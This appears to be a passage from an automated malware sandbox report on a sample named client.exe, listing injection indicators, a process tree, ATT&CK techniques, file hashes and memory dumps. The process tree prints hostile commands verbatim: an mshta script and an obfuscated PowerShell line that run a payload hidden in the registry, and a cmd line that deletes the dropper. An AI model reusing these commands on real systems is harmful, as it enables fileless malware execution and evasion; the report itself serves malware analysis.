3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3164 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4100 powershell.exe
3164 Explorer.EXE
3164 Explorer.EXE
3164 Explorer.EXE
3164 Explorer.EXE
3164 Explorer.EXE
2668 cmd.exe
3164 Explorer.EXE

pid	process
3164	Explorer.EXE

pid	process
4100	powershell.exe
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
3164	Explorer.EXE
2668	cmd.exe
3164	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3164	Explorer.EXE
Token: SeCreatePagefilePrivilege	3164	Explorer.EXE
Token: SeShutdownPrivilege	3812	RuntimeBroker.exe
Token: SeShutdownPrivilege	3812	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3164 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3164 Explorer.EXE

pid	process
3164	Explorer.EXE

pid	process
3164	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1292 wrote to memory of 4100	1292	mshta.exe	powershell.exe
PID 1292 wrote to memory of 4100	1292	mshta.exe	powershell.exe
PID 4100 wrote to memory of 556	4100	powershell.exe	csc.exe
PID 4100 wrote to memory of 556	4100	powershell.exe	csc.exe
PID 556 wrote to memory of 3092	556	csc.exe	cvtres.exe
PID 556 wrote to memory of 3092	556	csc.exe	cvtres.exe
PID 4100 wrote to memory of 2692	4100	powershell.exe	csc.exe
PID 4100 wrote to memory of 2692	4100	powershell.exe	csc.exe
PID 2692 wrote to memory of 4732	2692	csc.exe	cvtres.exe
PID 2692 wrote to memory of 4732	2692	csc.exe	cvtres.exe
PID 4100 wrote to memory of 3164	4100	powershell.exe	Explorer.EXE
PID 4100 wrote to memory of 3164	4100	powershell.exe	Explorer.EXE
PID 4100 wrote to memory of 3164	4100	powershell.exe	Explorer.EXE
PID 4100 wrote to memory of 3164	4100	powershell.exe	Explorer.EXE
PID 3164 wrote to memory of 3812	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3812	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3812	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3812	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 2668	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 2668	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 2668	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 3404	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3404	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3404	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 3404	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 4748	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 4748	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 4748	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 4748	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 856	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 856	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 856	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 856	3164	Explorer.EXE	RuntimeBroker.exe
PID 3164 wrote to memory of 2668	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 2668	3164	Explorer.EXE	cmd.exe
PID 2668 wrote to memory of 2916	2668	cmd.exe	PING.EXE
PID 2668 wrote to memory of 2916	2668	cmd.exe	PING.EXE
PID 2668 wrote to memory of 2916	2668	cmd.exe	PING.EXE
PID 2668 wrote to memory of 2916	2668	cmd.exe	PING.EXE
PID 2668 wrote to memory of 2916	2668	cmd.exe	PING.EXE
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe
PID 3164 wrote to memory of 4188	3164	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3404

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3164

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 476
3⤵
- Program crash
PID:3808

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vlcy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vlcy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name brttfhpkqw -value gp; new-alias -name nsrwrjomsf -value iex; nsrwrjomsf ([System.Text.Encoding]::ASCII.GetString((brttfhpkqw "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rk3kkeve\rk3kkeve.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF30.tmp" "c:\Users\Admin\AppData\Local\Temp\rk3kkeve\CSC501C538AF223439A98F4C69910ECEDE9.TMP"
5⤵
PID:3092

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\drcgfmbc\drcgfmbc.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE097.tmp" "c:\Users\Admin\AppData\Local\Temp\drcgfmbc\CSC3D59D200177E42BF9E9F97E27BF856FD.TMP"
5⤵
PID:4732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2916

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4188

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3652 -ip 3652
1⤵
PID:4968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESDF30.tmp
Filesize
1KB

MD5
31ca4b89f773178973e59025faf1e8bd

SHA1
7281f5c71e6984a2b9715516c3727879aab59ecb

SHA256
bc127658f5e678ca102a863084c3769511f9c02e57636a14fe55b2bff5870b82

SHA512
9cc4712ee1871718624e5744c0d0227706a5f11a2932c9c242ab09140532322ca202aa1a647747e0848ed4dac76feb164110733039662e6b901f1978a59b78a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ij51ocvh.sg1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\drcgfmbc\drcgfmbc.dll
Filesize
3KB

MD5
a0e69968d022bf93cb5e3a45cf031040

SHA1
aef5888200cc9ce495ecde4e70dbb2e95e00f2f1

SHA256
bc5b30434e10e2ea54b30c5354bcc8da0ecd0e19870988a2147a6d47758f0359

SHA512
b27800f3fccab506db9581cd0a3135756b4bc5ca307330b379a8f59eeef290ad6bf41af07eb15a7185666ea1e15c6d566a0769a6f8a246676854fe5566c4f247

Download Submit
C:\Users\Admin\AppData\Local\Temp\rk3kkeve\rk3kkeve.dll
Filesize
3KB

MD5
3dec986b97e3018f87f47f3ea0b07b06

SHA1
1d6808d68761136b02f8dd62239409d6f4b3a14b

SHA256
c661fb392956630f8ab3c7c8a24f7ce287dac8282f9e5a87268559f39406be31

SHA512
8709d6bba457aef3be2c2cbe06f0c030ef0b844d4e50c5f320665b5549165844c9801ccdb880a17d9566df78696a5f7debb622d092e8903fdb43c82a13fea54a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\drcgfmbc\drcgfmbc.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\drcgfmbc\drcgfmbc.cmdline
Filesize
369B

MD5
d42993ff91927edb3203dffa36daaf67

SHA1
54727c09bd3e30b9e9a0a9f55c83aaae1549bae4

SHA256
77b41f79a4cf8bb229342f370e3e477c21a35e524b94ee50f0148e09b2d666f5

SHA512
a1b299176295302f227cd74e9466d4dc12e213d73a0c2817fb6316db8a14983ef1bb1133f3fb24d85d0f934b755e5389fe16654b8bd4bd791e207c1ed3194946

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rk3kkeve\CSC501C538AF223439A98F4C69910ECEDE9.TMP
Filesize
652B

MD5
4b479a756d67ff9083495ac40205c4aa

SHA1
557c016d5321308b326c41ce731614fec4d1d148

SHA256
1f18a296bc24ab607b60245f38293855445911e72db6742c001b1b7775adf4ab

SHA512
b0c646ee799bd8dd728608405b35412bddbf4a225a11cb785b19e4160db784f2e9ca2bfa5008706217822e06e0765d0f0e70ca4a684520d7ac5859c07bed64ed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rk3kkeve\rk3kkeve.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rk3kkeve\rk3kkeve.cmdline
Filesize
369B

MD5
3a5a833806693766f7e655f8ae4002fb

SHA1
2878baf4a34685a99d4cb704c3b1ca5e2566f7d3

SHA256
3a0808918036356589b5763ae622a31d6afcd76d545793f192934437443c7e76

SHA512
d5bca946a640c7b943ec03ae88a16048f762ef36a9cbf688aa3cdc424d894bd5952604d7c902cc82d158e6f6980084de2bafa4fbb99647c83316122b715123e2

Download Submit
memory/856-119-0x000001B491F40000-0x000001B491FE4000-memory.dmp

Filesize
656KB

Download
memory/856-88-0x000001B491F40000-0x000001B491FE4000-memory.dmp

Filesize
656KB

Download
memory/856-91-0x000001B491A30000-0x000001B491A31000-memory.dmp

Filesize
4KB

Download
memory/2668-94-0x000001DC5B7E0000-0x000001DC5B7E1000-memory.dmp

Filesize
4KB

Download
memory/2668-92-0x000001DC5B730000-0x000001DC5B7D4000-memory.dmp

Filesize
656KB

Download
memory/2668-118-0x000001DC5B730000-0x000001DC5B7D4000-memory.dmp

Filesize
656KB

Download
memory/2916-104-0x0000015A41DE0000-0x0000015A41DE1000-memory.dmp

Filesize
4KB

Download
memory/2916-117-0x0000015A41C30000-0x0000015A41CD4000-memory.dmp

Filesize
656KB

Download
memory/2916-101-0x0000015A41C30000-0x0000015A41CD4000-memory.dmp

Filesize
656KB

Download
memory/3164-58-0x00000000005E0000-0x00000000005E1000-memory.dmp

Filesize
4KB

Download
memory/3164-57-0x0000000008650000-0x00000000086F4000-memory.dmp

Filesize
656KB

Download
memory/3164-102-0x0000000008650000-0x00000000086F4000-memory.dmp

Filesize
656KB

Download
memory/3404-78-0x000001A5BE840000-0x000001A5BE841000-memory.dmp

Filesize
4KB

Download
memory/3404-76-0x000001A5BE880000-0x000001A5BE924000-memory.dmp

Filesize
656KB

Download
memory/3404-114-0x000001A5BE880000-0x000001A5BE924000-memory.dmp

Filesize
656KB

Download
memory/3652-115-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/3652-1-0x00000000022F0000-0x00000000023F0000-memory.dmp

Filesize
1024KB

Download
memory/3652-9-0x0000000002410000-0x000000000241B000-memory.dmp

Filesize
44KB

Download
memory/3652-4-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/3652-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/3652-5-0x0000000004040000-0x000000000404D000-memory.dmp

Filesize
52KB

Download
memory/3652-2-0x0000000002410000-0x000000000241B000-memory.dmp

Filesize
44KB

Download
memory/3652-8-0x00000000022F0000-0x00000000023F0000-memory.dmp

Filesize
1024KB

Download
memory/3812-109-0x000001E06A780000-0x000001E06A824000-memory.dmp

Filesize
656KB

Download
memory/3812-71-0x000001E06A780000-0x000001E06A824000-memory.dmp

Filesize
656KB

Download
memory/3812-72-0x000001E06A740000-0x000001E06A741000-memory.dmp

Filesize
4KB

Download
memory/4100-24-0x00007FFD9E040000-0x00007FFD9EB01000-memory.dmp

Filesize
10.8MB

Download
memory/4100-64-0x00007FFD9E040000-0x00007FFD9EB01000-memory.dmp

Filesize
10.8MB

Download
memory/4100-41-0x000001E524C90000-0x000001E524C98000-memory.dmp

Filesize
32KB

Download
memory/4100-26-0x000001E524CA0000-0x000001E524CB0000-memory.dmp

Filesize
64KB

Download
memory/4100-28-0x000001E524CA0000-0x000001E524CB0000-memory.dmp

Filesize
64KB

Download
memory/4100-53-0x000001E524FF0000-0x000001E524FF8000-memory.dmp

Filesize
32KB

Download
memory/4100-27-0x000001E524CA0000-0x000001E524CB0000-memory.dmp

Filesize
64KB

Download
memory/4100-65-0x000001E525000000-0x000001E52503D000-memory.dmp

Filesize
244KB

Download
memory/4100-55-0x000001E525000000-0x000001E52503D000-memory.dmp

Filesize
244KB

Download
memory/4100-14-0x000001E524C20000-0x000001E524C42000-memory.dmp

Filesize
136KB

Download
memory/4188-113-0x0000000000FB0000-0x0000000001048000-memory.dmp

Filesize
608KB

Download
memory/4188-111-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
memory/4188-108-0x0000000000FB0000-0x0000000001048000-memory.dmp

Filesize
608KB

Download
memory/4748-116-0x000001E6B2A90000-0x000001E6B2B34000-memory.dmp

Filesize
656KB

Download
memory/4748-83-0x000001E6B2A90000-0x000001E6B2B34000-memory.dmp

Filesize
656KB

Download
memory/4748-84-0x000001E6B2880000-0x000001E6B2881000-memory.dmp

Filesize
4KB

Download